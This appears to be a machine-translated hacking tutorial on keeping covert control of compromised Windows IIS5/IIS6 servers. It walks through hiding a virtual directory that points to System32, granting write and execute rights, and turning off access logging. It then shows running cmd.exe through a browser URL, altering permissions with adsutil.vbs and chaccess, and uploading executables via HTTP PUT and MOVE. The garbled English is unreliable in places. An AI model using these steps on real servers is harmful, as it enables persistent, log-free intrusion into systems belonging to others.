Windows IIS does backdoor, hidden access, no logs

Windows IIS5/IIS6 do backdoor, hide access, do not leave access record or leave log

Hard to attack a windows2000/2003 IIS server, you must be thinking, how to long-term possession of the "broiler" it? Smart you will think of the way to leave the back door.
On the Windows familyWeb server, I think the bestThere is no back door to the back door through the 80 port, because if you want to provide Web services externally, the administrator will not put 80 port to shield it. Let's take a look at how to set up IISBackdoor.
One GUI mode setting
It would be easiest if you could manage your broiler through a GUI (graphical interface) (via 3389-port Windows Terminal Services, 4899-port Radmin service, Pcanywhere, VNC, Dameware and other GUI-style remote management software). A concealed backdoor can be created as follows:
1. First create a subdirectory shell under the Web root, then open the Internet Information Services Manager, create a new virtual directory door in the shell directory that points to C:\WinNT \system32, and then deleteThe shell directory under the Web root so that the shell directory is not visible in IIS Manager, and the door virtual directory is not visible (this is a bug in the IIS display directory, in fact this virtual directory still exists).
The path to the shell cannot be accessed through the browser, but the path to the Shell/door is still accessible. But that's not the end of the list, and we need to set the permissions for the virtual directory door in IIS Manager.
2. In the door property, we set the local path to "C:\WinNT\System32" (see figure), tick the "Script resource Access", "read", "write", "Directory Browsing" check boxes, remove the "Log access" and "Index this resource" check box, and in "Execute license" select " Scripts and executable programs, application Protection Select Low (IIS process).
Well, now we have a powerful web shell that doesn't leave any traces (do you remember the Unicode vulnerability?). In the Address bar, enter HTTP//219.***.18.63/shell/door/cmd.exe?/c+dir c \ See).
Two command-line mode settings
One might ask, if only the shell under the command line, can you set up the IIS backdoor? The answer is yes. Some of the tools that come with the system are needed here. IIS Server installation automatically installs some scripts to configure IIS under C:\Inetpub\AdminScript, such as Adsutil.vbs, Chaccess.vbs, Mkwebdir.vbs, Disptree.vbs and so on, we can modify the permissions of the Web directory through these scripts.
Under command line shell, enter "cscript.exe adsutil.vbs enum w3svc/1/Root "To see the configuration of the Web server. Choose a virtual directory test and give it writable permissions: "Chaccess-a w3svc/1/root/test +write", give it the script and executable execution permissions as follows: "Chaccess-a w3svc/1/root/ Test +script +execute ".
Three use writable executable permissions directory
Here are two ways to get a writable directory on the IIS server, but how do you use it?
There are many ways to take advantage of the IIS backdoor, which only discusses how to take advantage of a directory with writable executable permissions. The general idea is to remotely submit data, experts like to use the Swiss Army knife--netcat, but this is the command line under the tool, novice use may not be used to. The following is a description of a Guilin Veteran's published works (: Http://www.gxgl.com/?actio
N=SOFT&MODULE=SHOW&ID=12).
Packet formats include options,, DELETE, PUT, post, and more. We can use the Put method to select a file from the local upload to the server, and then use the Move method to rename it to an. exe executable program or. asp script. For more detailed use, refer to the Readme document accompanying the program, which will not be mentioned here.

Windows IIS does backdoor, hidden access, no logs